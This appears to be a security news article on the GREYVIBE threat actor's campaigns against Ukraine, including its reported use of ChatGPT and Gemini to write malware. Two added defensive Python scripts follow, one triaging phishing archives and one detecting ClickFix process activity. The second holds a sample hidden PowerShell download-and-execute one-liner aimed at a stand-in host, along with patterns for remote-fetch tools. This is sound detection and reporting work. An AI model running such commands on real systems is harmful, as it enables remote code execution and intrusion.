Hacker-City
Technology | May 29, 2026 | 6 min read

New Russian-Linked GREYVIBE Targets Ukraine with AI-Powered Cyberattacks

A previously undocumented Russian-speaking threat actor dubbed GREYVIBE has been conducting persistent cyberattacks against Ukraine since August 2025, pairing AI-assisted malware development with several social engineering tactics, including spear-phishing, fake CAPTCHA pages, and fraudulent websites.

Tags: greyvibe, ukraine, cyberattacks, malware, artificial-intelligence, russian-hackers, phishing, remote-access-trojan, cyber-espionage, withsecure
The Hacker News

Contributor

A previously undocumented threat actor known as GREYVIBE has been linked to a series of ongoing cyberattacks targeting Ukraine and associated entities, commencing in August 2025.

According to research by WithSecure, GREYVIBE is a Russian-speaking group that operates primarily within the Russian time zone. Its activity aligns closely with the Kremlin's state interests, in particular intelligence gathering related to the ongoing Russo-Ukrainian conflict.

"The group has utilized various attack vectors, such as spear-phishing emails, fake captcha pages, and fraudulent adult entertainment websites attributed to Ukraine, to deploy malware across a diverse range of victims," stated WithSecure researcher Mohammad Kazem Hassan Nejad in an analysis. "Throughout these operations, the group has employed custom-obfuscated code, loaders, and various malware programs."

The victims span military, government, civilian, and commercial organizations. Alongside its alignment with state objectives, GREYVIBE also appears to overlap with the broader Russian cybercrime community: several of its members are suspected of being current or former cybercriminals.

Evidence further suggests that the adversary is using generative artificial intelligence (GenAI) and large language models (LLMs) to support its operations. Overall, WithSecure characterizes GREYVIBE as a "low-to-moderately sophisticated group" that shows operational security shortcomings even as it uses AI-assisted tooling to speed up malware development.

Attack Chains

GREYVIBE has been documented executing a series of attack chains against its targets:

PhantomMail involves spear-phishing emails carrying links to malicious ZIP or RAR archives hosted on Google Drive and 4sync. The archives contain JavaScript-based loaders that open a decoy document and run PhantomRelay, a PowerShell-based remote access trojan (RAT) that profiles the host and executes PowerShell scripts and Windows commands.
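As an added illustration of the mail-gateway check a defender would want for this chain (this is not WithSecure's tooling and not code from the article), the Python below triages a ZIP attachment for script loaders hidden beside a decoy document and checks whether a link points at one of the file-hosting services named above. The sample archive is constructed in memory, and the extension lists, the host list, and the padded-filename heuristic are my assumptions rather than indicators from the report.

```python
"""Added example (not WithSecure's tooling and not code from the article):
triage a mail-delivered archive for the kind of script loader the
PhantomMail chain uses. The ZIP built below is constructed for
illustration, as are the extension lists and the set of hosting domains.
RAR archives need the third-party `rarfile` module; only ZIP is handled here.
"""
import io
import re
import zipfile

# Windows script-host and shortcut formats that execute on double-click (assumed list)
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".lnk", ".ps1", ".bat", ".cmd"}
# Document/image extensions commonly faked in double-extension names (assumed list)
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}
# File-hosting services named in the article as archive hosts (match host or subdomain only)
ARCHIVE_HOSTS = ("drive.google.com", "docs.google.com", "4sync.com")


def is_archive_link(url: str) -> bool:
    """True when the URL's host is one of ARCHIVE_HOSTS or a subdomain of one."""
    m = re.match(r"https?://([^/?#:]+)", url, re.I)
    if not m:
        return False
    host = m.group(1).lower()
    # exact or subdomain match only, so "evil-4sync.com" does not count
    return any(host == h or host.endswith("." + h) for h in ARCHIVE_HOSTS)


def suspicious_members(data: bytes) -> list:
    """Return the archive members that look like script loaders, with reasons."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            base = info.filename.rsplit("/", 1)[-1]
            name = base.lower()
            parts = name.split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            reasons = []
            if ext in SCRIPT_EXTS:
                reasons.append("script loader extension " + ext)
            if len(parts) > 2 and "." + parts[-2] in DECOY_EXTS:
                reasons.append("double extension masquerading as ." + parts[-2])
            if re.search(r"\s{3,}\.\w+$", name):
                reasons.append("whitespace padding to hide the real extension")
            if reasons:
                findings.append({"name": base, "size": info.file_size, "reasons": reasons})
    return findings


def build_sample() -> bytes:
    """Constructed ZIP resembling a PhantomMail lure: decoy document plus JS loader."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Dokument.pdf", "%PDF-1.4 decoy, not a real document")
        # The loader body is a placeholder string, not real malware.
        zf.writestr("Dokument.pdf.js", "// constructed placeholder loader\n")
        zf.writestr("Zvit                        .js", "// padded name\n")
        zf.writestr("notes.txt", "benign text\n")
    return buf.getvalue()


if __name__ == "__main__":
    for f in suspicious_members(build_sample()):
        print(f["name"], "->", "; ".join(f["reasons"]))
    print(is_archive_link("https://drive.google.com/uc?export=download&id=abc"))
```

The host check deliberately accepts only exact or subdomain matches, since a naive `endswith("4sync.com")` would also accept look-alike domains registered by the attacker.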

PhantomClick uses ClickFix-style fake CAPTCHA pages on fraudulent domains posing as Zoom and LAPAS, tricking users into running commands that start a PhantomRelay infection chain.
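ClickFix lures get the victim to paste a command into the Run dialog or the File Explorer address bar, so the resulting interpreter is a child of explorer.exe; the article does not detail GREYVIBE's exact command lines, so the following is an added, generic detection example (not WithSecure's content) that scores constructed process-creation events for that pattern. Field names mirror Sysmon Event ID 1; the marker list, the scoring thresholds, and the sample events are my assumptions.

```python
"""Added example (not WithSecure's detection content and not code from the
article): score process-creation events for the ClickFix execution pattern
behind PhantomClick. The events below are constructed; the field names mirror
Sysmon Event ID 1, and the marker list and scoring thresholds are assumptions.
"""
import base64
import re

# ClickFix lures have the user paste a command into the Run dialog or the
# File Explorer address bar, so the interpreter's parent is explorer.exe.
CLICKFIX_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# (pattern, label); each pattern is tested against the raw and the decoded command line
MARKERS = [
    (ENCODED_RE, "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-nop(?:rofile)?\b", re.I), "no profile"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "invoke-expression"),
    (re.compile(r"downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I), "remote fetch"),
    (re.compile(r"mshta(?:\.exe)?\s+https?://", re.I), "mshta remote script"),
    (re.compile(r"frombase64string", re.I), "inline base64 decode"),
]


def decode_encoded_command(cmdline: str) -> str:
    """Recover the UTF-16LE script behind PowerShell's -EncodedCommand, or ''."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev: dict) -> dict:
    """Score one process-creation event; markers found in the decoded blob count too."""
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    decoded = decode_encoded_command(cmd)
    hits = [label for pat, label in MARKERS if pat.search(cmd) or (decoded and pat.search(decoded))]
    parent_hit = parent in CLICKFIX_PARENTS and image in INTERPRETERS
    score = (2 if parent_hit else 0) + len(hits)
    return {
        "image": image, "parent": parent, "hits": hits, "decoded": decoded,
        "score": score,
        # an interpreter spawned by explorer.exe with any marker, or a heavily
        # loaded command line from anywhere, is worth an analyst's look
        "suspicious": (parent_hit and bool(hits)) or len(hits) >= 3,
    }


def triage(events: list) -> list:
    return [score_event(e) for e in events]


# Constructed sample: the -enc blob encodes a harmless placeholder one-liner.
_PLACEHOLDER = "iex (iwr http://example.invalid/c)"
_ENC = base64.b64encode(_PLACEHOLDER.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -w hidden -nop -enc {_ENC}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" /n'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["suspicious"], r["score"], r["image"], r["hits"])
```

Decoding the `-enc` blob before matching matters: the first event's raw command line contains none of the download-and-execute keywords, and only the decoded script reveals them. A scheduled-task PowerShell run under svchost.exe with an ordinary `-File` argument scores zero, which keeps routine administration out of the queue.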

PrincessClub uses counterfeit Ukrainian adult club websites to deliver FallSpy to Android devices and PhantomRelayV1 or LegionRelay to Windows. Later iterations of the lure sites added a WebRTC-based live call feature to capture the victim's audio and video. FallSpy is Android malware that extracts sensitive data; LegionRelay is a lightweight PowerShell-based RAT that supports file enumeration, file exfiltration, screenshot capture, browser data theft, exfiltration of Telegram and WhatsApp data, and enabling RDP access; PhantomRelayV1 is a PhantomRelay variant with a custom watchdog persistence mechanism.

DroneLink distributes malware through websites impersonating charities that support the Armed Forces of Ukraine, delivering WireGuard and LegionRelay.

Nebo uses a FallSpy variant that mimics a Russian-language login interface, likely to convince Ukrainian military personnel that they are accessing a legitimate Russian military portal.

AI-Assisted Operations

The diverse array of delivery methods and tools seen in these attacks is likely a product of the group's use of AI platforms such as Ideogram AI, OpenAI ChatGPT, and Google Gemini, which the researchers link to generating lure images, developing LegionRelay, writing obfuscation and loader scripts, managing backend infrastructure, and running post-compromise commands.

WithSecure notes that GREYVIBE's use of AI brings several advantages: it compensates for gaps in technical proficiency, speeds up development, and reduces reliance on already known malware or tools whose reuse could aid attribution.

"If an actor can consistently generate, modify, or substitute elements of its operational footprint with AI assistance, traditional clustering techniques based on stable technical artifacts may prove less reliable over time," Nejad noted.

AI-assisted development has also had a cost: it introduced design errors into LegionRelay that exposed the malware's inner workings. That is the kind of misstep a more mature nation-state actor would usually avoid, and a further sign that GREYVIBE is not a fully polished one.

Links to Cybercrime Ecosystem

The group's connections to the cybercriminal ecosystem rest on several observations:

  • Potential access to an ISO builder associated with the TrickBot gang and UAC-0098
  • PhantomRelay variants appearing in otherwise unrelated cybercrime activity clusters, notably a Microsoft Teams voice phishing campaign that ran from July 2025 to February 2026 and a KongTuke delivery chain from late February to late March 2026 that used ClickFix for malware distribution
  • The upload of preliminary development and testing samples to VirusTotal
  • The adoption of informal internet slang terms such as "letsrollboyos," "totallyunsus," and "cuteuwu" as naming conventions for developmental artifacts
  • The deployment of XMRig miners on a limited number of LegionRelay-infected machines

"Considering these factors, we assess with moderate confidence that the group has affiliations with the broader cybercrime ecosystem, and with low-to-moderate confidence that it includes current or former cybercriminal members," WithSecure asserted. "The precise nature of their relationship to the Russian state remains ambiguous; it is unclear whether such members have been integrated into a state-backed collective, operate independently under state-directed objectives, or have formed a hybrid entity."

"The group finds itself in a grey area between cybercrime and state-affiliated operations, complicating attribution efforts and blurring conventional distinctions between these domains."
